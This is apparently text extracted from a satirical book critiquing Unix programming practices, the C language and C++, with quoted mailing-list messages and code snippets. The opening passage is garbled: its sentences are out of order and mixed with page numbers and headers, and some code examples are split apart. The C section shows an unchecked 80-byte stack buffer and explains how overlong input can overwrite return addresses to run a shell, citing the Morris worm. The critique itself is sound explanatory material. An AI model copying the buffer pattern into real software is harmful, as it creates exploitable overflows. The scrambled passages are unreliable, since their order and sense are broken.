It!” 187 it crashes is to run every program from your debugger.
read. albeit correct. The complete programming interface to input/output used to be open. because countless programs that have the workaround now depend on the buggy behavior and will break if it is fixed. changing the operating system interface has an even higher cost since an unknown number of utility programs will need to be modified to handle the new. close. each with its own slight variation. you should forget about debugging your application and debug the debugger. sendto. fixing bugs would require changing the Unix interface that zealots consider so simple and easy-to-understand. 1. writev. The addition of networking was more fuel for the fire. Unix can’t do everything right. the frog won’t notice and will be boiled to death. recv.188 Programming 7. Why fix things now? 2. and sendmsg. meaning there are five times as many opportunities for bugs and five different sets of performance characteristics to remember. That this interface doesn’t work is irrelevant. or just fixing the existing bugs. Where are the Twinkies? 3. It’s too hard to understand. in part. But there might be a hidden agenda as well. If the debugger dumps core. Unix programmers chant the mantra that the Unix interface is Simple and Beautiful. you know. However. 4. The longer you wait to fix a bug. Dead frog. The Unix interface is boiling over. Simple and Beautiful. But instead of buckling down and coming up with something better. Now there are at least five ways to send data on a file descriptor: write. Why should the debugger do that? Why not write some “tool” that does it instead? 6. interface behavior. the harder it becomes. . (This. Boiling water is hot. 5.) If you drop a frog into briskly boiling water it will immediately jump out. explains why programs like ls have so many different options to accomplish more-or-less the same thing. As a result. recvfrom. and write. Simple and Beautiful! (It’s got a nice ring to it. and recvmsg). What’s the problem? The statement “fixing bugs would break existing code” is a powerful excuse for Unix programmers who don’t want to fix bugs. The same holds true for reading data from a file descriptor (read. More than breaking existing code. Each involves a separate code path through the kernel. programming around bugs is particularly heinous since it makes the buggy behavior part of the operating system specification. doesn’t it?) Unfortunately. send. if you put a frog into cold water and slowly bring it to a boil.
m B. So you type mv *. April 1981). Very often. 3 Note that this decision flies in the face of the other lauded Unix decision to let any user run any shell.m and mv overwrites B. The Unix shells provide a shorthand for naming groups of files that are expanded by the shell.m for the last couple of hours and that was your only copy.—Eds.c. Hard. In “The Unix Programming Environment” by Kernighan and Mashey (IEEE Computer. that using the shell to expand filenames is not an historical accident: it was a carefully reasoned design decision. you might type rm *.m *.”3 Excuse me? The Standard I/O library (stdio in Unix-speak) is “available to programs in a uniform way. the authors claim that. having the shell expand file names doesn’t matter since the outcome is the same as if the utility program did it. You’re used to MS-DOS and you want to rename the files to A.c.m and B. The shell will expand “*” to “A B C” and pass these arguments to rm. They don’t even explain what they mean by “efficient. but there’s this mv command that looks like it does the same thing. For example. many problems with this approach. B.” Does having filename expansion in the shell produce the most efficient system for programmers to write small programs. A. say your directory contains the files A. My Makefile Depends on It!” 189 Filename Expansion There is one exception to Unix’s each-program-is-self-contained rule: filename expansion. one wants Unix utilities to operate on one or more files.m with A. There are many.m. “Incorporating this mechanism into the shell is more efficient than duplicating it everywhere and ensures that it is available to programs in a uniform way. There’s no rename command. The shell expands this to mv A.c and B. the efficiency claim is completely vacuous since they don't present any performance numbers to back it up. You can’t run any shell: you have to run a shell that performs star-name expansion. it sometimes bites. Hmm.“It Can’t Be a Bug. To remove all of these files. This is a bit of a shame since you had been working on B. You should know. and C.” What would have been wrong with having library functions to do filename expansion? Haven’t these guys heard of linkable code libraries? Furthermore. . though. or does it simply produce the most efficient system imaginable for deleting the files of untutored novices? Most of the time. producing a list of files that is passed to the utility.m. Say you are a novice user with two files in a directory. But like most things in Unix. which we discussed in the previous chapter.
The last few decades of programming language research have shown that adding linguistic support for things like error handling. or “All Lines Are Shorter Than 80 Characters” There is an amusing article in the December 1990 issue of Communications of the ACM entitled “An Empirical Study of the Reliability of Unix Utilities” by Miller. He decided to do a more systematic investigation of this phenomenon. there has been little motivation to add features such as data tags or hardware support for garbage collection into the last. C is a lowest-common-denominator language. So much for software tools. as a result. C has this effect on Unix.190 Programming Spend a few moments thinking about this problem and you can convince yourself that it is theoretically impossible to modify the Unix mv command so that it would have the functionality of the MS-DOS “rename” command. At the time Unix was created. and So. Because of C’s popularity. much of the inherent brain damage in Unix can be attributed to the C language. and abstract data types can make it dramatically easier to produce robust. It was designed to be compiled efficiently on a wide variety of computer hardware and. built at a time when the lowest common denominator was quite low. The time has come to write one in a language that has some form of error checking. has language constructs that map easily onto computer hardware. Fredriksen. In fact. current and next generation of microprocessors: these . The C language is minimal. The whole article started out as a joke. writing an operating system’s kernel in a high-level language was a revolutionary idea. automatic memory management. Most of the bugs were due to a number of well-known idioms of the C programming language. If a PDP-11 didn’t have it. The noted linguistic theorist Benjamin Whorf said that our language determines what concepts we can think. then C doesn’t have it. it prevents programmers from writing robust software by making such a thing unthinkable. reliable software. Occasionally the entire operating system panicked. One of the authors was trying to get work done over a noisy phone connection. and the line noise kept crashing various utility programs. C incorporates none of these findings. Unix’s kernel and all its utilities are written in C. Robustness. They fed random input to a number of Unix utility programs and found that they could make 24-33% (depending on which vendor’s Unix was being tested) of the programs crash or hang.
“It Can’t Be a Bug. if you have: char *str = "bugy”. huh? This duality can be commonly seen in the way C programs handle character arrays. Array variables are used interchangeably as pointers and as arrays. you might want to ensure that a piece of code doesn’t scribble all over arbitrary pieces of memory. like the program’s stack. Therefore it’s equally valid to write index[array]. especially if the piece of memory in question is important. To belabor the point. Why should it? The arrays are really just pointers. This brings us to the first source of bugs mentioned in the Miller paper. array[index]. …then the following equivalencies are also true: 0[str] *(str+1) *(2+str) str[3] Isn’t C grand? The problem with this approach is that C doesn’t do any automatic bounds checking on the array references. Many of the programs that crashed did so while reading input into a character buffer that was allocated on the call stack. The solution when using C is simply to use integers that are larger than the problem you have to deal with—and hope that the problem doesn’t get larger during the lifetime of your program. written in C. right? Well. There is an array indexing expression. wouldn’t use them. which is also shorthand for (*(array+index)). and you can have pointers to anywhere in memory. It has something that looks like an array but is really a pointer to a memory location. My Makefile Depends on It!” 191 features would amount to nothing more than wasted silicon since the majority of programs. that is merely shorthand for the expression (*(array + index)). == == == == 'b' 'u' 'g' 'y' . C doesn’t really have arrays either. Recall that C has no way to handle integer overflow. Clever. Many C programs do this. the following C function reads a line of input into a stack-allocated array and then calls do_it on the line of input.
2038.buff[80]. on January 18.192 Programming a_function() { char c. let’s imagine that our function is called upon to read a line of input that is 85 characters long. do_it is called. The ultimate example of careless Unix programming will probably occur at 10:14:07 p. do_it(buff). Exercise for the reader: What happens to this function when an end-of-file condition occurs in the middle of a line of input? When Unix users discover these built-in limits. which is passed as the first function argument. use dump. users develop ways to cope with the situation.” can’t deal with path names longer than 100 characters (including directories). The bounds check is probably missing because the programmer likes how the assignment statement (c = getchar()) is embedded in the loop conditional of the while statement. The function will read the 85 characters with no problem but where do the last 5 characters end up? The answer is that they end up scribbling over whatever happened to be in the 5 bytes right after the character array. What about an 850-character input line? It would probably overwrite important . Solution: don’t use tar to archive directories to tape. c and i. while ((c = getchar()) != '\n') buff[i++] = c. There is no room to check for end-of-file because that line of code is already testing for the end of a line. What was there before? The two variables. might be allocated right after the character array and therefore might be corrupted by the 85-character input line. } Code like this litters Unix. int i = 0. For example. the Unix “tape archiver. some people actually praise C for just this kind of terseness—understandability and maintainability be damned! Finally. and the character array suddenly becomes a pointer. tar. Instead. so that a file’s absolute path name is never longer than 100 characters. Note how the stack buffer is 80 characters long—because most Unix files only have lines that are 80 character long. buff[i] = '\000'. they tend not to think that the bugs should be fixed. Believe it or not. when Unix’s 32-bit timeval field overflows… To continue with our example. Note also how there is no bounds check before a new character is stored in the character array and no test for an end-of-file condition. Better solution: Don’t use deep subdirectories.m.
The net result was that later on the corrupted Makefile didn’t compile everything it should. it will call a piece of code that was also embedded in the 2. Exceptional Conditions The main challenge of writing robust software is gracefully handling errors and other exceptions.o files weren’t being written. such as addresses for returning from subroutine calls. over 2. As a result. so necessary . We say “probably” because you can corrupt the runtime stack to achieve an effect that the original programmer never intended. My Makefile Depends on It!” 193 bookkeeping information that the C runtime system stores on the stack. One full day wasted because some idiot thought 10 includes was the most anyone would ever use.“It Can’t Be a Bug. and then dangerously optimized code that was going to run for less than a millisecond in the process of creating X Makefiles! The disadvantage of working over networks is that you can’t so easily go into someone else's office and rip their bloody heart out. like exec a shell that can run commands on the machine. Imagine that our function was called upon to read a really long line. This embedded piece of code may do something truly useful. so the build eventually died.com> UNIX-HATERS how many fingers on your hands? Sad to say. Date: From: To: Subject: Thu. Why anyone would want to do that remains a mystery. 2 May 91 18:16:44 PDT Jim McDonald <jlm%missoula@lucid. C provides almost no support for handling exceptional conditions. At best. and that this line was set up to overwrite the bookkeeping information on the call stack so that when the C function returns.000 character line. Robert T. few people learning programming in today’s schools and universities know what exceptions are. this was part of a message to my manager today: The bug was that a program used to update Makefiles had a pointer that stepped past the array it was supposed to index and scribbled onto some data structures used to compute the dependency lists it was auto-magically writing into a Makefile.000 characters. Morris’s Unix Worm employed exactly this mechanism (among others) to gain access to Unix computers. . Unfortunately. corrupting this information will probably cause a program to crash.
cleaner. The code fragment shown allocates memory for the new struct. right? Thus programs ordinarily appear bug .. /* recover gracefully from the error */ [. “error: malloc: ???\n”). this is the way that all of the C textbooks say you are supposed to use the malloc() memory allocation function: struct bpt *another_function() { struct bpt *result. the C programmer is forced to write exception handlers for each and every system service request (this is the code in bold).. } The function another_function allocates a structure of type bpt and returns a pointer to the new struct.] return result.. /* Do something interesting */ return result. For example. } /* Do something interesting */ [.] return 0. Or not. Since C provides no exceptionhandling support. if (result == 0) { fprintf(stderr.194 Programming Exceptions are conditions that can arise when a function does not behave as expected. the programmer must add several lines of exception-handling code for each service request. } It’s simpler. Their programs look like this: struct bpt *another_function() { struct bpt *result=malloc(sizeof(struct bpt)). Exceptions frequently occur when requesting system services such as allocating memory or opening files.. Since C provides no explicit exception-handling support. result = malloc(sizeof(struct bpt)). and most of the time operating system service requests don’t return errors. Many C programmers choose not to be bothered with such trivialities and simply omit the exception-handling code.
When used properly. since most Unix utilities don’t check the return codes from write() system calls.. Lisp implementations usually have real exception-handling systems. Reasons are obvious: programmers are a bit lazy. article “An Empirical Study of the Reliability of Unix Utilities” is that the article immediately preceding it tells about how .. it is vitally important for system administrators to make sure that there is free space on all file systems at all time.It is of vital importance that all programs on their own check results of system calls (like write).UUCP In article <448@myab.. (So not checking also makes your system look better in benchmarks that use standard utilities.se (Lars Pensj) writes: . but unfortunately very few programs actually do this for read and write. C programs.” A really frightening thing about the Miller et al.“It Can’t Be a Bug. Every function definition also has a list of exceptional conditions that could be signaled by that function. they can probably write as many bytes as they need. I agree.. whereupon they mysteriously fail. My Makefile Depends on It!” 195 free until they are put into extraordinary circumstances. These handlers get called automatically when the exceptions are raised— no intervention or special tests are needed on the part of the programmer. CLU programs tend to be quite robust since CLU programmers spend time thinking about exception-handling in order to get the compiler to shut up.) The author goes on to state that. and the programs become smaller and faster if you don’t check.. these handlers lead to more robust software. The exceptional conditions have names like OUT-OF-MEMORY and the programmer can establish exception handlers for specific types of conditions. Explicit linguistic support for exceptions allows the compiler to grumble when exceptions are not handled. The programming language CLU also has exception-handling support embedded into the language.. Things like this should make you go “hmmm. on the other hand… Date: 16 Dec 88 16:12:13 GMT Subject: Re: GNU Emacs From: debra@alice.se> lars@myab. And it’s true: most Unix programs assume that if they can open a file for writing. It is very common in Unix utilities to check the result of the open system call and then just assume that writing and closing will go well..
These HPs live on the same net as SUN. no one would buy them! This is a real phenomenon. because his machine throws away error messages. Catching Bugs Is Socially Unacceptable Not checking for and not reporting bugs makes a manufacturer’s machine seem more robust and powerful than it actually is. doesn’t know his machine is hosed and spending half its time retransmitting packets). Date: From: To: Subject: Thu.edu> UNIX-HATERS Now. MIPS. More importantly. but when we inform the owner of the other machine (who. 11 Jan 90 09:07:05 PST Daniel Weise <daniel@mojave.stanford. and DEC workstations. Hmmm. isn’t that clear? Due to HP engineering. Very often we will have a problem because of another machine. if Unix machines reported every error and malfunction. . my HP Unix boxes REPORT errors on the net that they see that affect them.196 Programming Mission Control at the Johnson Space Center in Houston is switching to Unix systems for real-time data acquisition. he will claim the problem is at our end because our machine is reporting the problem! In the Unix world the messenger is shot.
you can make it run for a long period of time by periodically restarting it. The following man page recently crossed our desk.If You Can’t Fix It. every 5 minutes. Every 60 seconds. bad data. Restart It! 197 If You Can’t Fix It. as the bugs it lists are the usual bugs that Unix programmers never seem to be able to expunge from their server code: NANNY(8) Unix Programmer's Manual NANNY(8) 4 Forwarded to UNIX-HATERS by Henry Minsky.8. since our mail queue will explode if we lose name resolution even for a short time. it kills the existing named and starts a new one.4 Newsgroups: comp.edu (Theodore Ts’o)4 Subject: Re: DNS performance metering: a wish list for bind 4. such a solution leaves open an obvious question: how to handle a buggy ninit program? Write another program to fork ninits when they die for “unknown reasons”? But how do you keep that program running? Such an attitude toward errant software is not unique. The BUGS section is revealing. We still haven’t figured out whether it's a joke or not. We are running this on the MIT nameservers and our mailhub. which was put in place to keep mail service running in the face of an unreliable named program: Date: 14 May 91 05:43:35 GMT From: tytso@athena.protocols.stats.mit. Of course. Here’s an example of this type of workaround. Restart It! So what do system administrators and others do with vital software that doesn’t properly handle errors. The solution isn’t very reliable. nor scalable. but it is good enough to keep Unix creaking along. In addition. ninit restarts a new named. It’s especially useful on our mailhub. We find that it is extremely useful in catching nameds that die mysteriously or that get hung for some unknown reason. This causes named to dump statistical information to /usr/tmp/ named. ninit wakes up and sends a SIGIOT to named.tcp-ip. .domains This is what we do now to solve this problem: I’ve written a program called “ninit” that starts named in nofork mode and waits for it to exit. ninit tries to do a name resolution using the local named. When it exits. if it runs OK for a short period of time. If it fails to get an answer back in some short amount of time. and bad operating conditions? Well.
unfortunately. Nanny was created and implemented to oversee (babysit) these servers in the hopes of preventing the loss of essential services that the servers are providing without constant intervention from a system manager or operator. Thus. the logging data is essential for tracing events and should be retained when possible. As of this time. On the other hand. Finally. This causes nanny to think that the server is dead and start another one time and time again. BUGS A server cannot do a detaching fork from nanny. bad file names or files that are not really configuration files will make nanny die..A server to run all servers SYNOPSIS /etc/nanny [switch [argument]] [. . most servers provide logging data as their output.198 Programming NAME nanny . If the network code produces errors. Nanny relies very heavily on the networking facilities provided by the system to communicate between processes. These servers. In addition. nanny can not tolerate errors in the configuration file.switch [argument]] DESCRIPTION Most systems have a number of servers providing utilities for the system and its users. Nanny deals with this overflow by being a gobetween and periodically redirecting the logging data to new files.. Not all switches are implemented. SWITCHES .. tend to go west on occasion and leave the system and/or its users without a given service. In this way. the logging data is partitioned such that old logs are removable without disturbing the newer data.. nanny can not tolerate the errors and will either wedge or loop. This data has the bothersome attribute of using up the disk space where it is being stored. nanny provides several control functions that allow an operator or system manager to manipulate nanny and the servers it oversees on the fly..
… . Hope that nobody is up late working on a big problem set due Monday morning.m. Restart It! 199 Restarting buggy software has become such a part of common practice that MIT’s Project Athena now automatically reboots its Andrew File System (AFS) Server every Sunday morning at 4 a.If You Can’t Fix It.
.
They were grades. The idea of object-oriented programming dates back to Simula in the 60s. make code more robust. Where did the names “C” and “C++” come from? A. It’s just one big mess of afterthoughts. hitting the big time with Smalltalk in the early 70s. Instead of simplifying things. There is no grammar specifying the language (something practically all other languages have). Like Unix.10 C++ The COBOL of the 90s Q. . it mutated as one goofy mistake after another became obvious. Don’t expect to see any of these advantages in C++. That’s because C++ misses the point of what being object-oriented was all about. so you can’t even tell when a given line of code is legitimate or not. —Jerry Leichter It was perhaps inevitable that out of the Unix philosophy of not ever making anything easy for the user would come a language like C++. C++ sets a new world record for complexity. Other books can tell you how using any of dozens of object-oriented languages can make programmers more productive. C++ was never designed. and reduce maintenance costs.
which actually was a marvelous feat of engineering. The Assembly Language of Object-Oriented Programming There’s nothing high-level about C++. unreadable. Fortunately. any precise and complete description of the desired behavior of a program may be expressed straightforwardly in that language. • Abstraction: each expression in a high-level language describes one and only one concept. incompatible. this means their code will be idiosyncratic. Usually. let us look at the properties of a true high-level language: • Elegance: there is a simple. A high-level language lets programmers express solutions in a manner appropriate to the problem. modern compilers can generate very efficient code for a wide variety of platforms. • Power: with a high-level language. and impossible to understand or reuse. The seeds of software disasters for decades to come have already been planted and well fertilized. it’s already too late. Concepts may be described independently and combined freely. Companies that are now desperate to rid themselves of the tangled. High-level programs are relatively easy to maintain because their intent is clear. most good programmers know that they can avoid C++ by writing largely in C. this means writing their own non-object-oriented tools to get just the features they need. so high-level code is naturally very portable and reusable. easily understood relationship between the notation used by a high-level language and the concepts expressed. The only marvelous thing about C++ is that anyone manages to get any work done in it at all. The ones who have already switched to C++ are only just starting to realize that the payoffs just aren’t there. From one piece of high-level source code. To see why. given the technology of its day. But a thin veneer of C++ here and there is just enough to fool managers into approving their projects. steering clear of most of the ridiculous features that they’ll probably never understand anyway. . Of course. Of course.204 C++ Comparing C++ to COBOL is unfair to COBOL. patchwork messes of COBOL legacy code are in for a nasty shock.
Not only does this make the code inscrutible. Pretty soon you’ll fill up with unreclaimed objects.” What happens when your memory space becomes fragmented? The remedy would normally be to tidy things up by moving the objects around. Pardon Me. But if you’re conservative. it’s well known that the vast majority of program errors have to do with memory mismanagement. you corrupt your program and you crash. but perhaps not right away. initialize it properly. but you can’t in C++—if you forget to update every reference to every object correctly. most of which have more to do with the machine’s internal operation than with the problem being solved. low-level code becomes out of date and must be manually patched or converted at enormous expense. and never reclaim an object unless you’re absolutely sure it’s no longer in use. because it isn’t cluttered with memory-management details. As new systems come along. Before you can use an object. Fail to keep track of an object. Of course. with disastrous consequences for the slightest error. Crash city. and dispose of it properly. For example. Detecting and correcting these mistakes are notoriously difficult. This is the dreaded “memory leak. several wonderful things happen: • The vast majority of your bugs immediately disappear. and it corrupts your program. and you might deallocate its space while it’s still in use. Now. and crash. Most real high-level languages give you a solution for this—it’s called a garbage collector. because they are often sensitive to subtle differences in configuration and usage patterns for different users. When you use a language with a built-in garbage collector. each of these tasks is extraordinarily tedious and error-prone. Your Memory Is Leaking… High-level languages offer built-in solutions to commonly encountered problems. and it will crash. keep track of it somehow. Better allocate some more structures to keep track of the structures that you need to allocate space for. but it builds in obsolescence. practically every other year these days. run out of memory. Use an improperly initialized structure. and your program will crash. isn’t that nice? • Your code becomes much smaller and easier to write and understand. . Use a pointer to a structure (but forget to allocate memory for it). watch out. and never makes a mistake. It tracks all your objects for you.The Assembly Language of Object-Oriented Programming 205 A low-level language demands attention to myriad details. recycles them when they’re done. you have to allocate some space for it.
And since there’s no standard garbage collector for C++. alas. University of Colorado at Boulder) which describes the results of a study comparing performance of programmer-optimized memory management techniques in C versus using a standard garbage collector. suppose you’re one of those enlightened C++ programmers who wants a garbage collector. When you close one of your windows containing one of my database records. and they try to build one. Many have been brainwashed into thinking that somehow this is more efficient than using something written by experts especially for the platform they use. These objects would just hang around until all available space was filled up—a memory leak. and you write a window system with yours. are forced to pick up their garbage manually. C programmers get significantly worse performance by rolling their own. lots of people agree it’s a good idea. all over again. It turns out that you can’t add garbage collection to C++ and get anything nearly as good as a language that comes with one built-in. The second thing is that even if you could write a garbage collector that only detected objects some of the time. (surprise!) the objects in C++ are no longer objects when your code is compiled and running. Go read The Measured Cost of Conservative Garbage Collection by B. your window wouldn’t know how to notify my record that it was no longer being referenced. OK. track. C++ users. It may be more efficient once or twice on a given configuration. what its type is. There’s no dynamic type information—no way any garbage collector (or for that matter. and sector numbers instead of by name. . You’re not alone. You don’t even have to take our word for it.206 C++ • Your code is more likely to run at maximum efficiency on many different platforms in many different configurations. guess what. For one thing. but you sure wouldn’t want to use a word processor this way. and whether someone’s using it at the moment. this will most assuredly happen. These same people probably prefer to create disk files by asking for platter. Oh my. a user with a debugger) can point to any random memory location and tell for sure what object is there. Zorn (Technical Report CU-CS573-92. you’d still be screwed if you tried to reuse code from anyone else who didn’t use your particular system. Let’s say I write a database with my garbage collector. They’re just part of a continuous hexadecimal sludge.
and even harder to learn to use well.stanford. compiles into a 300K image). If the programmer gives an invalid index.. That’s right. This reads x. .. One reason why Unix programs are so fragile and unrobust is that C coders are trained from infancy to make them that way. by the way. don’t report an error. instead of the usual 0 to m. if (ch == 'i') [handle "i" case] else if (ch == 'c') [handle "c" case] else in = cm = 0. The user indicates the unit of the input by appending “i” for inches and “c” for centimeters. . Date: From: To: Subject: Mon. the program just blithely returns the first element of the array. written in true Unix and C style: #include <stream. an example is given that implements arrays with indexes that range from n to m.. Just do something arbitrary.. 8 Apr 91 11:29:56 PDT Daniel Weise <daniel@mojave. Here is the outline of the program. is a program that performs inch-to-centimeter and centimeter-to-inch conversion. one of the first complete programs in Stroustrup’s C++ book (the one after the “hello world” program. [perform conversion] } Thirteen pages later (page 31). .The Assembly Language of Object-Oriented Programming 207 Hard to Learn and Built to Stay That Way C++ shares one more important feature with assembly language—it is very difficult to learn and use. Unix brain death forever! . which. then reads ch.h> main() { [declarations] cin >> x >> ch. For example. . A design abortion.edu> UNIX-HATERS From their cradle to our grave.
Parser experts cringe when they read things like that because they know that such rules are very difficult to implement correctly. Instead. and I fed it to cfront.0. In C.Z in the directory ftp/pub: “It should be noted that my grammar cannot be in constant agreement with such implementations as cfront because a) my grammar is internally consistent (mostly courtesy of its formal nature and yacc verification). They make typos. The result is a language with nonsensical rules that are so complicated they can rarely be learned. C++ was never formally designed: it grew. most programmers keep them on a ready-reference card. but… every time I have had difficulty figuring what was meant syntactically by some construct that the ARM was vague about. —Alan Perlis Practically every kind of syntax error you can make in the C programming language has been redefined in C++. For example. C++’s syntactical stew owes itself to the language’s heritage.uci.edu. these syntax errors don’t always produce valid code. no matter how bad it is. there is a C++ rule that says any string that can be parsed as either a declaration or a statement is to be treated as a declaration. AT&T didn’t even get some of these rules correct. Ad hoc rules were used to disambiguate these.)” . The reason is that people aren’t perfect. if you pick up Jim Roskind’s free grammar for C++ from the Internet host ics. or simply refuse to use all of C++’s features and merely program with a restricted subset. Unfortunately. For example. As C++ evolved. (I will probably take a lot of flack for that last snipe. so that now it produces compilable code. cfront dumped core. Indeed. and b) yacc generated parsers don’t dump core. you will find the following note in the file c++grammar2. these typos are usually caught by the compiler. a number of constructs were added that introduced ambiguities into the language. promising headaches when somebody actually tries to run the code. In C++ they slide right through. when Jim Roskind was trying to figure out the meanings of particular constructs—pieces of code that he thought reasonable humans might interpret differently—he wrote them up and fed them to AT&T’s “cfront” compiler.tar. Cfront crashed.208 C++ Syntax Syrup of Ipecac Syntactic sugar causes cancer of the semi-colon.
It’s a bug.lang.’ ‘o. but the AT&T compiler treats it as a slash followed by an open-comment delimiter.c++ Brown University Dept.edu (Scott Meyers) comp. ‘foo. so my questions are: 1. why? Scott Meyers sdm@cs. ‘f. and I can’t find anything in Stroustrup’s book that indicates that any other interpretation is to be expected.brown.brown.Syntax Syrup of Ipecac 209 Date: From: To: Cc: Subject: Sun.’ but as one.edu UNIX-HATERS C++ Comments 21 May 89 23:59:37 GMT sdm@cs. Is this a bug in the AT&T preprocessor? If not. Actually.0. Thus ‘foo’ is not parsed as three identifiers. 21 May 89 18:02:14 PDT tiemann (Michael Tiemann) sdm@cs. why not? If so. I want the former interpretation. { return *p/*q. compiling -E quickly shows that the culprit is the preprocessor.’ See how useful this rule is in the following program (and what a judicious choice ‘/*’ was for delimiting comments): double qdiv (p.brown. . Is it a bug in the GNU preprocessor? If so. or are we stuck with it? 2.edu There is an ancient rule for lexing UNIX that the token that should be accepted be the longest one acceptable. *q. namely. of Computer Science Date: From: Newsgroups: Organization: Consider the following C++ source line: //********************** How should this be treated by the C++ compiler? The GNU g++ compiler treats this as a comment-to-EOL followed by a bunch of asterisks. } So why is the same rule not being applied in the case of C++? Simple. will it be fixed in 2. q) double *p.’ and ‘o.
They expose the internals to such an extent that the users of a class are intimately dependent on the implementation details of that . C++ assumes that anyone sophisticated enough to want garbage collection. you begin to realize that C++ is fundamentally crippled in the area of abstraction. or other similar features is sophisticated enough to implement them for themselves and has the time to do so and debug the implementation. It is difficult to take another programmer’s C++ code.000.210 C++ Michael Worst of all. But—hey—with C++. or FORTH code you might ever run across. even the standard dialects are private ones. are actually implemented in a way that defies modularity. The real power of C++’s operator overloading is that it lets you turn relatively straightforward code into a mess that can rival the worst APL. the language is hard to read and hard to understand. which can be a complete obscurity to every other C++ programmer. is that even with a restricted subset. the biggest problem with C++. A chunk of code that implements some functionality is supposed to be hidden behind a wall of modularity.000. dynamic loading. As any computer science text will tell you. Classes. ADA. look at it. The language shows no taste.000–line program. this is the principle source of leverage for sensible design. If you have a 100. you have to watch out for 10. Complexity arises from interactions among the various parts of your system. Once you get underway writing a major project in C++. Every C++ programmer can create their own dialect. Abstract What? You might think C++’s syntax is the worst part. and any line of code may depend on some detail appearing in any other line of code. C++ is a language that wants to consider itself object-oriented without accepting any of the real responsibilities of object orientation. the whole point of C++. for those who use it on a daily basis. and quickly figure out what it means.000 possible interactions. but that’s only when you first start learning it. It’s an ugly mess. Abstraction is the art of constraining these interactions by channeling them through a few well-documented interfaces.
Have you ever met anyone who actually likes using templates? The result is that the way many kinds of concepts are expressed depends on the context in which they appear and how they are used. The kinds it does offer are confused and hard to understand. In most cases. Your software is no longer “soft” and malleable. with possibly catastrophic consequences. and it may be linked with a user interface toolkit with another class called Button. no more annoying type checking. 18 Mar 94 10:52:58 PST From: Scott L. A program for a clothing manufacturer may have a class called Button. but misses many important kinds. Many important concepts cannot be expressed in a simple way at all. but since there are so many ways to bypass them. Date: Fri. Many other languages offer thoughtfully engineered mechanisms for different kinds of abstraction. changing a class forces a recompile of all code that could possibly reference it. Burson <gyro@zeta-soft. you have to put half of your code in the header files.Abstract What? 211 class. once expressed. it’s more like quick-setting cement. a namespace is a common way of preventing one set of names appropriate to one part of your code from colliding with another set of names from another part. Once there. There’s no way to be sure you haven’t taken a name used somewhere else in your program. of course. With namespaces. For example. C++ offers some of these.com> Subject: preprocessor . this is no problem. just to declare your classes to the rest of the world. They may run into some of the other protection mechanisms. Your only hope is to garble up your code with nonsensical prefixes like ZjxButton and hope nobody else does the same. these are mere speedbumps to someone in a hurry to violate protocol. Cast everything as void* and presto. Not so in C++. you’re loathe to change them. Well. since the rules for the usage and meaning of both concepts are clear and easy to keep straight. Of course. nor. This typically brings work to a standstill while entire systems must be recompiled. the public/private distinctions provided by a class declaration are worthless since the “private” information is in the headers and is therefore public information. Programmers start to go to extraordinary lengths to add or change functionality through twisted mechanisms that avoid changing the headers. thereby forcing a dreaded recompile. can they be given a name that allows them subsequently to be invoked directly.
Sounds like a simple task.212 C++ C weenies will tell you that one of the best features of C is the preprocessor. To parse stuff like this in its original form is all but impossible (to our knowledge. the preprocessor has been the only way to get expressions open-coded (compiled by being inserted directly into the instruction stream. it’s never been done). The worst problem with the C preprocessor is that it locks the Unix world into the text-file prison and throws away the key.y) ((x) < (y) ? (x) : (y)) Suppose you wanted to write a utility to print a list of all functions in some program that reference min. Consider. Why? Because it is all but impossible to parse unpreprocessed C code.) But that’s only the beginning. right? .. (Almost none of which would be there if the various versions of Unix were actually compatible. min. Most Unix programmers aren’t used to having such environments and don’t know what they’re missing. for instance: #ifdef BSD int foo() { #else void foo() { #endif /* . For most of the time that C has been around. It is virtually impossible to usefully store C source code in any form other than linear text files.. is commonly defined as a preprocessor macro: #define min(x. depending on whethe the macro ‘BSD’ has been defined or not. */ } Here the function foo has two different beginnings. Let’s look at an example. Actually. open-coding is an important efficiency technique. Many C programs are unintelligible rats’ nests of #ifdefs. rather than as a function call). it is probably the worst. For very simple and commonly used expressions. but there are all kinds of extremely useful features that can easily be provided when automated analysis of source code is possible. For instance. which we were just talking about above. Why is this so awful? Because it limits the amount of intelligence we can put into our programming environments.
you will notice a number of apparently redundant parentheses.which ones may be omitted. all occurrences of min have been removed! So you’re stuck with running grep. this will be expanded to: a = ((b++) < (c) ? (b++) : (c)) So if ‘b’ is less than ‘c’. If min were a function. rig the sails on a small ship.) But the nastiest problem with this min macro is that although a call to it looks like a function call. Consider: a = min(b++. In fact. and why. (Actually. the result may not parse as intended. they aren’t all necessary -. C++ Is to C as Lung Cancer Is to Lung “If C gives you enough rope to hang yourself. for instance. and the returned value would be the original value of ‘b’. c). on the other hand. or else when the min macro is expanded within another expression. is left as an exercise for the reader. In the min macro just displayed. and still have enough rope to hang yourself from the yardarm” —Anonymous . ‘b’ would get incremented only once.C++ Is to C as Lung Cancer Is to Lung 213 But you can’t tell where function boundaries are without parsing the program. these parentheses must all be provided. There are other problems with using the preprocessor for open-coding. then C++ gives you enough rope to bind and gag your neighborhood. and you can’t parse the program without running it through the preprocessor. By textual substitution. and the value returned will be the original value of ‘b’ plus one. ‘b’ will get incremented twice rather than once. it doesn’t behave like a function call. and once you have done that.
Over the past few years. It’s quickly becoming a line item on resumes. it’s probably in the best interest of every computer scientist and serious programmer to learn C++.214 C++ Sadly. we’ve known many programmers who know how to program in C++. who can even write reasonably good programs in the language… …but they hate it. though. .
but it’s been whizzing around Cyberspace for so long that the task would probably be impossible.The Evolution of a Programmer 215 The Evolution of a Programmer [We’d love to assign credit for this. Senior year in college (defun hello () (print (list 'HELLO 'WORLD))) New professional #include <stdio.argv) int argc.h> main (argc. char **argv. output). } . —Eds. begin writeln ('Hello world').] High school/Junior high 10 PRINT "HELLO WORLD" 20 END First year in college program Hello(input. { printf ("Hello World!\n"). end.
I need a program to output the string ‘Hello World!’” . i< size . for (i=0. chrs[i] != '\0'.h> const int MAXLEN = 80. void assign(char *chrs).print(). size=i. for (i=0 . class outstring { private: int size. } Manager “George. } ~outstring() {size=0. cout << "\n". void outstring::print() { int i. class outstring. public: outstring() { size=0.216 C++ Seasoned pro #include <stream. i++) cout << str[i]. char str[MAXLEN].i++) str[i] = chrs[i].} void print(). } void outstring::assign(char *chrs) { int i. }. string. } main (int argc. string. char **argv) { outstring string.assign("Hello World!").
The Evolution of a Programmer 217 .
218 .
Part 3: Sysadmin’s Nightmare .
.
